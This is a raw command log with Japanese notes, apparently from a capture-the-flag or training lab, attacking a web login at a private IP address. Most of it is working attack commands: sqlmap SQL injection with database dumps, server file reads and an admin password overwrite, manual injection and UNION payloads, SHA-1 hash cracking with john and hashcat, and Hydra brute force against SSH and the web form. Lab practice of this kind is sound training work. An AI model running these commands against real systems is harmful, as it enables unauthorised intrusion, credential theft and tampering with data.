sudo apt update
sudo apt install -y sqlmap
sudo apt install -y wordlists
sudo apt install hashcat -y

curl -sS -L "http://10.0.1.118:8000/login.php" -o login.html
grep -i "<input" -n login.html

python3 /usr/bin/sqlmap -u "http://10.0.1.118:8000/login.php" \
  --data="username=__INJECT__&password=any" \
  -p username \
  --batch \
  --level=3 --risk=2 \
  --technique=BEUST \
  --threads=2


curl -i -s -L \
  -d "user=nosuchuser&pass=wrong" \
  "http://10.0.1.118:8000/login.php" -o /tmp/login_fail.html

tail -n +1 /tmp/login_fail.html | sed -n '1,120p'

curl -i -s -L \
  -d "user=' OR '1'='1' -- &pass=foo" \
  "http://10.0.1.118:8000/login.php" -o /tmp/login_payload1.html

wc -c /tmp/login_fail.html /tmp/login_payload1.html

python3 /usr/bin/sqlmap -u "http://10.0.1.118:8000/login.php" \
  --data="user=^USER^&pass=foo" \
  -p user \
  --batch --level=1 --risk=1 --technique=BEUST

python3 /usr/bin/sqlmap -u "http://10.0.1.118:8000/login.php" \
  --data="user=^USER^&pass=foo" \
  -p user --users --passwords --tables --batch

curl -i -s -L -d "user=' OR '1'='1' -- &pass=foo" "http://10.0.1.118:8000/login.php" -o result.html
wc -c result.html

sudo python3 /usr/bin/sqlmap -u "http://10.0.1.118:8000/login.php" \
  --data="user=admin&pass=foo" \
  -p user \
  --batch --risk=2 --level=2 --technique=BEUST \
  --dump

echo -n admin | sha1sum

curl -i -s -L \
  -d "user=Me&pass=admin" \
  "http://10.0.1.118:8000/login.php" -o login_success.html
grep -oE "flag-[0-9]+" login_success.html

cat login_success.html | head -n 30

echo -n "password" | sha1sum

hashid f995a883ee7e3977641f97c42a869ee267caa022

grep -oE "href=\"[^\"]+\"" login_success.html
*/flag.php や /admin.php などが見つかれば、それを curl で取得

user@ip-10-0-0-10:~$ hashid f995a883ee7e3977641f97c42a869ee267caa022
Analyzing 'f995a883ee7e3977641f97c42a869ee267caa022'
[+] SHA-1 
[+] Double SHA-1 
[+] RIPEMD-160 
[+] Haval-160 
[+] Tiger-160 
[+] HAS-160 
[+] LinkedIn 
[+] Skein-256(160) 
[+] Skein-512(160) 
user@ip-10-0-0-10:~$ grep -oE "href=\"[^\"]+\"" login_success.html
href="https://use.fontawesome.com/releases/v5.6.3/css/all.css"
href="css/bootstrap4-neon-glow.min.css"
href="https://fonts.googleapis.com/css?family=Roboto"
user@ip-10-0-0-10:~$ 

curl -c cookies.txt -d "user=Me&pass=admin" "http://10.0.1.118:8000/login.php"
curl -b cookies.txt "http://10.0.1.118:8000/victims.php" | grep -oE "flag-[0-9]+"


curl -c cookies.txt -d "user=Me&pass=admin" "http://10.0.1.118:8000/login.php"
curl -b cookies.txt "http://10.0.1.118:8000/victims.php" | grep -oE "flag-[0-9]+"

cat login_success.html | head -n 30

echo "f995a883ee7e3977641f97c42a869ee267caa022" > hash.txt
john --format=raw-sha1 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

hashcat -m 100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

curl -c cookies.txt -d "user=Me&pass=<見つけたパスワード>" "http://10.0.1.118:8000/login.php"
curl -b cookies.txt "http://10.0.1.118:8000/victims.php" | grep -oE "flag-[0-9]+"


ls /usr/share/wordlists || true
find / -type f -name "*rockyou*" -maxdepth 5 2>/dev/null || true

cat > small-pass.txt <<'EOF'
admin
password
123456
12345678
qwerty
letmein
iwannacry
Me
me
admin123
root
secret
welcome
password1
EOF

john --format=raw-sha1 --wordlist=small-pass.txt hash.txt

while read p; do
  echo -n "$p" | sha1sum | awk '{print $1 "  " "'"$p"'"}'
done < small-pass.txt | grep f995a883ee7e3977641f97c42a869ee267caa022 -n -B1 -A1 || true

python3 - <<'PY'
import hashlib
target="f995a883ee7e3977641f97c42a869ee267caa022"
with open("small-pass.txt") as f:
    for p in f:
        p=p.strip()
        if not p: continue
        if hashlib.sha1(p.encode()).hexdigest()==target:
            print("FOUND:",p)
            break
    else:
        print("Not found in small-pass.txt")
PY

john --format=raw-sha1 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

john --format=raw-sha1 --incremental hash.txt

ls -l /root/.local/share/sqlmap/output/10.0.1.118/dump/iwannacry/
cat /root/.local/share/sqlmap/output/10.0.1.118/dump/iwannacry/*.csv

ls -l /root/.local/share/sqlmap/output/10.0.1.118/dump/iwannacry/

grep -R -n "flag-" /root/.local/share/sqlmap/output/10.0.1.118/dump/iwannacry/ || true

cat /root/.local/share/sqlmap/output/10.0.1.118/dump/iwannacry/users.csv | sed -n '1,120p'
cat /root/.local/share/sqlmap/output/10.0.1.118/dump/iwannacry/victims.csv | sed -n '1,120p'

cat > small-pass.txt <<'EOF'
admin
password
123456
12345678
qwerty
letmein
iwannacry
Me
me
admin123
root
secret
welcome
password1
EOF


python3 - <<'PY'
import hashlib
target="f995a883ee7e3977641f97c42a869ee267caa022"
with open("small-pass.txt") as f:
    for p in f:
        p=p.strip()
        if not p: continue
        if hashlib.sha1(p.encode()).hexdigest()==target:
            print("FOUND:",p)
            break
    else:
        print("Not found in small-pass.txt")
PY

# ハッシュファイル準備（もしまだでなければ）
echo "f995a883ee7e3977641f97c42a869ee267caa022" > hash.txt

# John による辞書攻撃（wamerican を使う）
john --format=raw-sha1 --wordlist=/var/lib/dictionaries-common/wordlist/wamerican hash.txt

# 結果確認
john --show hash.txt || true

curl -c cookies.txt -d "user=Me&pass=PASSWORD_FOUND" "http://10.0.1.118:8000/login.php" -o after_login.html
grep -oE "flag-[0-9]+" after_login.html || true
curl -b cookies.txt "http://10.0.1.118:8000/victims.php" | grep -oE "flag-[0-9]+" || true

for p in admin.php dashboard.php flag.php secret.php security.php index.php victims.php; do
  echo "=== $p ==="
  curl -s -b cookies.txt "http://10.0.1.118:8000/$p" | grep -oE "flag-[0-9]+" || true
done


target="f995a883ee7e3977641f97c42a869ee267caa022"
awk -F, 'NR>1 {print $4}' /root/.local/share/sqlmap/output/10.0.1.118/dump/iwannacry/users.csv | \
while read u; do
  h=$(echo -n "$u" | sha1sum | awk '{print $1}')
  if [ "$h" = "$target" ]; then
    echo "FOUND: password equals username -> $u"
    exit 0
  fi
done
echo "No match for username-as-password"


python3 - <<'PY'
import hashlib
target="f995a883ee7e3977641f97c42a869ee267caa022"
with open("small-pass.txt") as f:
    for p in f:
        p=p.strip()
        if p and hashlib.sha1(p.encode()).hexdigest()==target:
            print("FOUND:",p)
            break
    else:
        print("Not found in small-pass.txt")
PY


# ハッシュファイル準備（既にあれば再利用可）
echo "f995a883ee7e3977641f97c42a869ee267caa022" > hash.txt

# wamerican で辞書攻撃
john --format=raw-sha1 --wordlist=/var/lib/dictionaries-common/wordlist/wamerican hash.txt

# 結果を表示
john --show hash.txt || true


john --format=raw-sha1 --incremental=All --min-length=1 --max-length=6 hash.txt
# 進捗確認
john --status
# 見つかったら
john --show hash.txt


sudo sqlmap -u "http://10.0.1.118:8000/login.php" \
  --data="user=Me&pass=foo" -p user \
  --batch --file-read="/var/www/html/flag.txt"

sudo sqlmap -u "http://10.0.1.118:8000/login.php" \
  --data="user=Me&pass=foo" -p user \
  --batch --file-read="/var/www/html/flag" 

sudo sqlmap -u "http://10.0.1.118:8000/login.php" \
  --data="user=Me&pass=foo" -p user \
  --batch --file-read="/root/flag"



curl -c cookies.txt -d "user=Me&pass=PASSWORD_FOUND" "http://10.0.1.118:8000/login.php" -o after_login.html
grep -oE "flag-[0-9]+" after_login.html || true


for p in admin.php dashboard.php flag.php secret.php security.php index.php victims.php; do
  echo "=== $p ==="
  curl -s -b cookies.txt "http://10.0.1.118:8000/$p" | grep -oE "flag-[0-9]+" || true
done


cat > small-pass.txt <<'EOF'
admin
password
123456
12345678
qwerty
letmein
iwannacry
Me
me
admin123
root
secret
welcome
password1
EOF



python3 - <<'PY'
import hashlib
target="f995a883ee7e3977641f97c42a869ee267caa022"
with open("small-pass.txt") as f:
    for p in f:
        p=p.strip()
        if p and hashlib.sha1(p.encode()).hexdigest()==target:
            print("FOUND:",p)
            break
    else:
        print("Not found in small-pass.txt")
PY

echo "f995a883ee7e3977641f97c42a869ee267caa022" > hash.txt
john --format=raw-sha1 --wordlist=/var/lib/dictionaries-common/wordlist/wamerican hash.txt
john --show hash.txt || true


sudo sqlmap -u "http://10.0.1.118:8000/login.php" \
  --data="user=Me&pass=foo" -p user \
  --batch --risk=2 --level=2 \
  --sql-query="UPDATE users SET pass=SHA1('pwned123') WHERE user='Me';"

★
sudo sqlmap -u "http://10.0.1.118:8000/login.php" --data="user=Me&pass=foo" -p user --sql-shell


# ログインして Cookie を保存
curl -c cookies.txt -d "user=Me&pass=pwned123" "http://10.0.1.118:8000/login.php" -o after_login.html

# まずページ内をチェック
grep -oE "flag-[0-9]+" after_login.html || true

# 管理ページ群を順に確認（Cookie を利用）
for p in admin.php dashboard.php flag.php secret.php security.php index.php victims.php; do
  echo "=== $p ==="
  curl -s -b cookies.txt "http://10.0.1.118:8000/$p" | grep -oE "flag-[0-9]+" || true
done
フラグが表示されたらその文字列（例 flag-1234）を提出します。

sudo sqlmap -u "http://10.0.1.118:8000/login.php" --data="user=Me&pass=foo" -p user \
  --batch --sql-query="UPDATE users SET pass='f995a883ee7e3977641f97c42a869ee267caa022' WHERE user='Me';"



1) sqlmap の sql-shell 内で：現在値確認 → 上書き → 再確認
sql-shell> プロンプトで以下を実行：

-- 現在の Me のパスとユーザ名を確認
SELECT user, pass FROM users WHERE user='Me';
（出力で現在のハッシュが見えるはずです。念のため確認）
sql-shell> SELECT user, pass FROM users WHERE user='Me';
[08:39:34] [INFO] fetching SQL SELECT statement query output: 'SELECT user, pass FROM users WHERE user='Me''
[08:39:34] [WARNING] the SQL query provided does not return any output
[08:39:34] [INFO] resumed: 'Me'
[08:39:34] [INFO] resumed: 'f995a883ee7e3977641f97c42a869ee267caa022'
SELECT user, pass FROM users WHERE user='Me': 'Me'
sql-shell> 

-- 管理者 Me のパスワードを "pwned123" に変更する（例）
UPDATE users SET pass=SHA1('pwned123') WHERE user='Me';
sql-shell> UPDATE users SET pass=SHA1('pwned123') WHERE user='Me';
[08:40:12] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
sql-shell> 

-- 変更を確認
SELECT user, pass FROM users WHERE user='Me';
pwned123 は任意の分かりやすいパスワードに変更できます（以降その文字列でログインします）。

SELECT の出力で pass が SHA1('pwned123') 相当になっていることを確認してください。

sql-shell> から抜けるには：

x
（または q と Enter）

2) 変更後に管理者でログインしてフラグを探す（端末で実行）
sql-shell を抜けたら次を実行：

# 管理者でログインして cookie を保存
curl -c cookies.txt -d "user=Me&pass=pwned123" "http://10.0.1.118:8000/login.php" -o after_login.html

# まずログイン応答内に flag がないか確認
grep -oE "flag-[0-9]+" after_login.html || true

# セッション Cookie を使って victims.php（成功時の遷移先）を確認
curl -s -b cookies.txt "http://10.0.1.118:8000/victims.php" | grep -oE "flag-[0-9]+" || true

# よくある管理ページ群を順にチェック（見つかるまで）
for p in admin.php dashboard.php flag.php secret.php security.php index.php victims.php; do
  echo "=== $p ==="
  curl -s -b cookies.txt "http://10.0.1.118:8000/$p" | sed -n '1,200p' | grep -oE "flag-[0-9]+" || true
done
どれかで flag-xxxx 形式の文字列が表示されればそれがフラグです。表示されたらそのままコピーして提出してください。

after_login.html の先頭（head）や末尾を見れば、ログイン成功の表示（Welcome やリダイレクト）が分かります。


sudo sqlmap -u "http://10.0.1.118:8000/login.php" \
  --data="user=Me&pass=foo" -p user \
  --batch --risk=2 --level=2 \
  --sql-query="UPDATE users SET pass='f995a883ee7e3977641f97c42a869ee267caa022' WHERE user='Me';"

2/5の解答
curl -c cookies.txt -s -L \
  -d "user=Me'-- %20&pass=ignored" \
  "http://10.0.1.118:8000/login.php" -o after_login1.html
wc -c after_login1.html
grep -nE "Wrong Username or Password|flag-[0-9]+|Welcome|Logout|Victims|victims" after_login1.html || true


curl -c cookies.txt -s -L \
  -d "user=Me'%23&pass=ignored" \
  "http://10.0.1.118:8000/login.php" -o after_login2.html
wc -c after_login2.html
grep -nE "Wrong Username or Password|flag-[0-9]+|Welcome|Logout|Victims|victims" after_login2.html || true


curl -c cookies.txt -s -L \
  -d "user=Me' OR '1'='1' -- %20&pass=ignored" \
  "http://10.0.1.118:8000/login.php" -o after_login3.html
wc -c after_login3.html
grep -nE "Wrong Username or Password|flag-[0-9]+|Welcome|Logout|Victims|victims" after_login3.html || true


curl -c cookies.txt -s -L \
  -d "user=Me'-- -&pass=ignored" \
  "http://10.0.1.118:8000/login.php" -o after_login4.html
wc -c after_login4.html
grep -nE "Wrong Username or Password|flag-[0-9]+|Welcome|Logout|Victims|victims" after_login4.html || true


curl -s -b cookies.txt "http://10.0.1.118:8000/victims.php" | sed -n '1,400p' | grep -oE "flag-[0-9]+"


for p in admin.php dashboard.php flag.php secret.php security.php index.php victims.php; do
  echo "=== $p ==="
  curl -s -b cookies.txt "http://10.0.1.118:8000/$p" | sed -n '1,200p' | grep -oE "flag-[0-9]+" || true
done

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
(2)
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# 代表的な管理ページを列挙して全部落とす（例）
for p in index.php login.php admin.php dashboard.php security.php; do
  curl -s "http://10.0.1.118:8000/$p" -o "page_${p}.html"
done

# HTML 全体から passwd.txt を検索
grep -R --line-number "passwd.txt" page_*.html || true

curl -s "http://10.0.1.118:8000/files/passwd.txt" -o passwd.txt
sed -n '1,120p' passwd.txt

awk -F: '{print $1}' passwd.txt | sort -u > users_raw.txt

grep -E '^[A-Za-z0-9._-]+$' passwd.txt | sort -u > users_raw.txt

awk 'length($0) >= 3 && $0 !~ /^[0-9]/ {print}' users_raw.txt > users.txt
wc -l users.txt
sed -n '1,50p' users.txt

nmap -sV 10.0.1.118 -p 22,80,8000

cat > small-pass.txt <<'EOF'
password
admin
admin123
123456
letmein
p@ssw0rd
EOF

hydra -L users.txt -P small-pass.txt -t 4 -f -o hydra_out.txt ssh://10.0.1.118

cat hydra_out.txt

hydra -L users.txt -P small-pass.txt 10.0.1.118 http-post-form "/login.php:user=^USER^&pass=^PASS^:Wrong Username or Password" -t 8 -f -o hydra_web_out.txt
cat hydra_web_out.txt

nl -ba page_admin.php | sed -n '35,55p'
grep -n "passwd.txt" page_admin.php
sed -n '40,50p' page_admin.php   # 出力された行番号に合わせて調整

curl -s -b cookies.txt -L "http://10.0.1.118:8000/files/passwd.txt" -o passwd.txt

curl -s -b cookies.txt -L "http://10.0.1.118:8000/downloads/passwd.txt" -o passwd.txt

curl -s -b cookies.txt -L "http://10.0.1.118:8000/download.php?file=passwd.txt" -o passwd.txt

file passwd.txt
sed -n '1,200p' passwd.txt

curl -c cookies.txt -s -L -d "user=Me'-- %20&pass=ignored" "http://10.0.1.118:8000/login.php" -o /dev/null

awk -F: 'NF>=1{print $1}' passwd.txt | sort -u > users_raw.txt

grep -E '^[A-Za-z0-9._-]{3,}$' passwd.txt | sort -u > users_raw.txt

grep -vE '(^root$|^daemon$|^www-data$|^nobody$)' users_raw.txt > users.txt

wc -l users.txt
sed -n '1,120p' users.txt

hydra -L users.txt -P small-pass.txt -t 4 -f -o hydra_ssh_out.txt ssh://10.0.1.118

cat hydra_ssh_out.txt

hydra -L users.txt -P small-pass.txt 10.0.1.118 http-post-form "/login.php:user=^USER^&pass=^PASS^:Wrong Username or Password" -t 4 -f -o hydra_web_out.txt
cat hydra_web_out.txt

sshpass -p 'PASSWORD' ssh -o StrictHostKeyChecking=no user@10.0.1.118 'id; hostname; ls -la ~'

sudo sqlmap -u "http://10.0.1.118:8000/login.php" \
  --data="user=Me&pass=foo" -p user --batch --file-read="/var/www/html/files/passwd.txt"

pwd
ls -la
ls -la page_*.html 2>/dev/null || true
ls -la cookies.txt 2>/dev/null || true

for p in index.php login.php admin.php dashboard.php security.php; do
  curl -s -b cookies.txt -L "http://10.0.1.118:8000/$p" -o "page_${p}.html"
done

grep -R --line-number "passwd.txt" page_*.html || true

nl -ba page_admin.php | sed -n '1,120p' 2>/dev/null || true

curl -c cookies.txt -s -L -d "user=Me'-- %20&pass=ignored" "http://10.0.1.118:8000/login.php" -o page_login_after.html

for p in index.php login.php admin.php dashboard.php security.php; do
  curl -s -b cookies.txt -L "http://10.0.1.118:8000/$p" -o "page_${p}.html"
done

grep -R --line-number "passwd.txt" page_*.html || true

curl -s -b cookies.txt -L "http://10.0.1.118:8000/files/passwd.txt" -o passwd.txt
file passwd.txt
sed -n '1,200p' passwd.txt


for path in files/passwd.txt /files/passwd.txt downloads/passwd.txt /downloads/passwd.txt passwd.txt /passwd.txt download.php?file=passwd.txt download.php?file=/files/passwd.txt; do
  echo "Trying: $path"
  curl -s -b cookies.txt -L "http://10.0.1.118:8000/$path" -o test_tmp.txt
  if [ -s test_tmp.txt ] && ! grep -q "Not Found" test_tmp.txt; then
    echo "OK: $path"
    file test_tmp.txt
    sed -n '1,200p' test_tmp.txt
    mv test_tmp.txt passwd.txt
    break
  fi
done

awk -F: 'NF>=1{print $1}' passwd.txt | sort -u > users_raw.txt

grep -E '^[A-Za-z0-9._-]{3,}$' passwd.txt | sort -u > users_raw.txt

grep -vE '(^root$|^daemon$|^www-data$|^nobody$|^sys$|^sync$|^bin$|^ftp$)' users_raw.txt > users.txt

wc -l users.txt
sed -n '1,200p' users.txt


hydra -L users.txt -P small-pass.txt -t 4 -f -o hydra_ssh_out.txt ssh://10.0.1.118
cat hydra_ssh_out.txt || true

sudo sqlmap -u "http://10.0.1.118:8000/login.php" --data="user=Me&pass=foo" -p user --batch --file-read="/var/www/html/files/passwd.txt"

grep -R --line-number "passwd.txt" page_*.html || true

awk -F: 'NF>=1{print $1}' passwd.txt | sort -u > users_raw.txt

grep -E '^[A-Za-z0-9._-]{3,}$' passwd.txt | sort -u > users_raw.txt

grep -vE '(^root$|^daemon$|^www-data$|^nobody$|^sys$|^sync$|^bin$|^ftp$)' users_raw.txt > users.txt

wc -l users.txt
sed -n '1,200p' users.txt

cat hydra_ssh_out.txt || true


sqlmap -u "http://10.0.1.118:8000/login.php" --data="user=admin&pass=foo" -p user --batch --dbs

sqlmap -u "http://10.0.1.118:8000/login.php" --data="user=admin&pass=foo" -p user --batch -D bbs --tables

sqlmap -u "http://10.0.1.118:8000/login.php" --data="user=admin&pass=foo" -p user --batch -D bbs -T flag --dump

sqlmap -u "http://10.0.1.118:8000/login.php" --data="user=admin&pass=foo" -p user --batch --search flag

sudo sqlmap -u "http://10.0.1.118:8000/login.php" --data="user=admin&pass=foo" -p user --batch --file-read="/var/www/html/flag.txt"
sudo sqlmap -u "http://10.0.1.118:8000/login.php" --data="user=admin&pass=foo" -p user --batch --file-read="/flag.txt"
sudo sqlmap -u "http://10.0.1.118:8000/login.php" --data="user=admin&pass=foo" -p user --batch --file-read="/home/neo/flag.txt"
sudo sqlmap -u "http://10.0.1.118:8000/login.php" --data="user=admin&pass=foo" -p user --batch --file-read="/tmp/flag.txt"


sudo sqlmap -u "http://10.0.1.118:8000/login.php" --data="user=admin&pass=foo" -p user --batch --file-read="/var/www/html/index.php"
sudo sqlmap -u "http://10.0.1.118:8000/login.php" --data="user=admin&pass=foo" -p user --batch --file-read="/var/www/html/admin.php"
sudo sqlmap -u "http://10.0.1.118:8000/login.php" --data="user=admin&pass=foo" -p user --batch --file-read="/var/www/html/flag-number.txt"


sudo sqlmap -u "http://10.0.1.118:8000/login.php" --data="user=admin&pass=foo" -p user --batch --file-read="/var/www/html/flag-number.txt"

sudo sqlmap -u "http://10.0.1.118:8000/login.php" --data="user=admin&pass=foo" -p user --batch --search flag


sqlmap -u "http://10.0.1.118:8000/login.php" \
--data="user=admin&pass=foo" -p user --batch -D iwannacry --tables

sqlmap -u "http://10.0.1.118:8000/login.php" \
--data="user=admin&pass=foo" -p user --batch -D iwannacry -T flag --dump

sqlmap -u "http://10.0.1.118:8000/login.php" \
--data="user=admin&pass=foo" -p user --batch -D iwannacry -T users --columns

sqlmap -u "http://10.0.1.118:8000/login.php" \
--data="user=admin&pass=foo" -p user --batch -D iwannacry --tables

sqlmap -u "http://10.0.1.118:8000/login.php" \
--data="user=admin&pass=foo" -p user --batch -D iwannacry -T flag --dump --ignore-redirects

sqlmap -u "http://10.0.1.118:8000/login.php" \
--data="user=admin&pass=foo" -p user --batch -D iwannacry -T flag --common-columns

sqlmap -u "http://10.0.1.118:8000/login.php" \
--data="user=admin&pass=foo" -p user --batch -D iwannacry -T flag -C flag --dump


sql-shell> USE iwannacry;
次にテーブル一覧を再確認：

sql-shell> SHOW TABLES;
（おそらく出力は users, admin, victims, flag）


sql-shell> DESCRIBE flag;

sql-shell> SELECT * FROM flag;

sql-shell> SHOW COLUMNS FROM flag;

sql-shell> SELECT * FROM iwannacry.flag;

sqlmap -u "http://10.0.1.118:8000/login.php" \
--data="user=admin&pass=foo" -p user \
--batch -D iwannacry --tables


sqlmap -u "http://10.0.1.118:8000/login.php" \
--data="user=admin&pass=foo" -p user \
--batch -D iwannacry -T flag --columns


sqlmap -u "http://10.0.1.118:8000/login.php" \
--data="user=admin&pass=foo" -p user \
--batch -D iwannacry -T flag --dump


sqlmap -u "http://10.0.1.118:8000/login.php" \
--data="user=admin&pass=foo" -p user \
--batch --threads=1 --no-cast --fresh-queries \
-D iwannacry -T flag --dump


sqlmap -u "http://10.0.1.118:8000/victims.php" \
--cookie="$(grep PHPSESSID cookies.txt | awk '{print $7"="$8}')" \
--batch --threads=1 --no-cast --fresh-queries \
-D iwannacry -T flag --dump


http://10.0.1.118:8000/victims.php?id=1

got a 302 redirect to 'http://10.0.1.118:8000/login.php'

cat cookies.txt

curl -c cookies.txt -s -L \
  -d "user=Me'-- %20&pass=ignored" \
  "http://10.0.1.118:8000/login.php" -o after_login.html
grep -o "flag-[0-9]\+" after_login.html

curl -b cookies.txt -s http://10.0.1.118:8000/victims.php | head -n 50

sqlmap -u "http://10.0.1.118:8000/victims.php?id=1" \
--cookie="$(grep PHPSESSID cookies.txt | awk '{print $7"="$8}')" \
--batch --threads=1 --no-cast --fresh-queries \
-D iwannacry -T flag --dump


sqlmap -u "http://10.0.1.118:8000/victims.php" \
--cookie="$(grep PHPSESSID cookies.txt | awk '{print $7"="$8}')" \
--forms --crawl=2 --batch

curl -b cookies.txt -s http://10.0.1.118:8000/victims.php | head -n 50


sqlmap -u "http://10.0.1.118:8000/victims.php?id=1" \
--cookie="$(grep PHPSESSID cookies.txt | awk '{print $7"="$8}')" \
--batch --threads=1 --no-cast --fresh-queries \
-D iwannacry -T flag --dump


sqlmap -u "http://10.0.1.118:8000/victims.php" \
--cookie="$(grep PHPSESSID cookies.txt | awk '{print $7"="$8}')" \
--forms --crawl=2 --batch


sqlmap -u "http://10.0.1.118:8000/login.php" \
  --data="user=^USER^&pass=foo" -p user \
  --cookie="SessionID=202e7d14e04aaf64e3152393aaee6641a2d62703; PHPSESSID=a3v8511a2fu8ctqiskqkjv5f1p" \
  --batch --threads=1 --no-cast --fresh-queries --risk=2 --level=2 \
  -D iwannacry -T flag --dump


sqlmap -u "http://10.0.1.118:8000/login.php" \
  --data="user=admin&pass=foo" -p user \
  --cookie="SessionID=202e7d14e04aaf64e3152393aaee6641a2d62703; PHPSESSID=a3v8511a2fu8ctqiskqkjv5f1p" \
  --batch --sql-shell

USE iwannacry;
SHOW TABLES;
DESCRIBE flag;
SELECT * FROM flag;


sqlmap -u "http://10.0.1.118:8000/login.php" \
  --data="user=^USER^&pass=foo" -p user \
  --cookie="SessionID=202e7d14e04aaf64e3152393aaee6641a2d62703; PHPSESSID=a3v8511a2fu8ctqiskqkjv5f1p" \
  --batch --threads=1 --no-cast --fresh-queries --risk=3 --level=3 --technique=EU \
  -D iwannacry -T flag --dump


curl -s -b cookies.txt -d "user=admin' UNION ALL SELECT NULL,CONCAT(0x7176766271,flag_number,0x716a6a6271),NULL,NULL-- -&pass=foo" \
  "http://10.0.1.118:8000/login.php" | grep -oE "flag-[0-9]+"


SHOW DATABASES;

USE iwannacry;

SHOW TABLES;

DESCRIBE flag;

SELECT * FROM flag;

SELECT flag_number FROM flag;

SHOW TABLES;
SELECT * FROM users;


SELECT column_name
FROM information_schema.columns
WHERE table_schema='iwannacry' AND table_name='flag';


SELECT flag_number FROM iwannacry.flag;

SELECT * FROM iwannacry.flag;


sqlmap -u "http://10.0.1.118:8000/login.php" \
  --data="user=admin&pass=foo" -p user \
  --cookie="SessionID=202e7d14e04aaf64e3152393aaee6641a2d62703; PHPSESSID=a3v8511a2fu8ctqiskqkjv5f1p" \
  --batch --threads=1 --no-cast --fresh-queries \
  --sql-query="SELECT column_name FROM information_schema.columns WHERE table_schema='iwannacry' AND table_name='flag';"


sqlmap -u "http://10.0.1.118:8000/login.php" \
  --data="user=admin&pass=foo" -p user \
  --cookie="SessionID=202e7d14e04aaf64e3152393aaee6641a2d62703; PHPSESSID=a3v8511a2fu8ctqiskqkjv5f1p" \
  --batch --threads=1 --no-cast --fresh-queries \
  --sql-query="SELECT flag_number FROM iwannacry.flag;"


curl -s -b cookies.txt -d "user=admin' UNION ALL SELECT NULL,CONCAT(0x7176766271,flag_number,0x716a6a6271),NULL,NULL-- -&pass=foo" \
  "http://10.0.1.118:8000/login.php" | grep -oE "flag-[0-9]+"



curl -s http://10.0.1.118:8000/admin.php | grep passwd

curl -s http://10.0.1.118:8000/dashboard.php | grep passwd

curl -s http://10.0.1.118:8000/passwd.txt -o passwd.txt
cat passwd.txt

hydra -L users.txt -P passwd.txt 10.0.1.118 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Wrong"

cat > users.txt <<EOF
cyber
ransom
neo
trinity
hacker
smith
EOF

curl -s http://10.0.1.118:8000/ | grep shadow

curl -s http://10.0.1.118:8000/shadow.txt
curl -s http://10.0.1.118:8000/shadow -o shadow

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 10.0.1.118 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Wrong"

curl -b cookies.txt -d "user=neo&pass=matrix" http://10.0.1.118:8000/login.php -L -o result.html
grep flag result.html

john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt

hydra -L users.txt -P passwd.txt 10.0.1.118 -s 8000 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Wrong"

sudo apt install -y wordlists
sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 10.0.1.118 -s 8000 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Wrong"

curl -I http://10.0.1.118:8000/login.php

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 10.0.1.118 -s 8000 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Wrong"


sudo mkdir -p /usr/share/wordlists
sudo curl -L -o /usr/share/wordlists/rockyou.txt \
  "https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt"
ls -lh /usr/share/wordlists/rockyou.txt
wc -l /usr/share/wordlists/rockyou.txt | awk '{print $1" lines"}'
head -n 5 /usr/share/wordlists/rockyou.txt

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt \
  10.0.1.118 -s 8000 \
  http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Wrong" \
  -t 4 -f -V


curl -s -i -X POST -d "user=cyber&pass=wrongpassword" \
  "http://10.0.1.118:8000/login.php" -o fail.html
echo "---- fail.html head ----"

head -n 40 fail.html

curl -s -c cookies.txt -L -d "user=Me'-- %20&pass=ignored" \
  "http://10.0.1.118:8000/login.php" -o success.html
echo "---- success.html head ----"

head -n 40 success.html

diff -u <(head -n 200 fail.html) <(head -n 200 success.html) | sed -n '1,120p'

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 10.0.1.118 -s 8000 \
  http-post-form "/login.php:user=^USER^&pass=^PASS^:S=Nice Work!" \
  -t 1 -f -V


hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 10.0.1.118 -s 8000 \
  http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Wrong" \
  -t 1 -f -V

curl -s -c cookies.txt -L \
  -d "user=cyber&pass=asdfghjkl%3B%27" \
  "http://10.0.1.118:8000/login.php" -o after_login.html

head -n 80 after_login.html

curl -s -b cookies.txt "http://10.0.1.118:8000/victims.php" | head -n 120
victims.php に flag-XXXXX のような情報が表示されるなら成功です。





























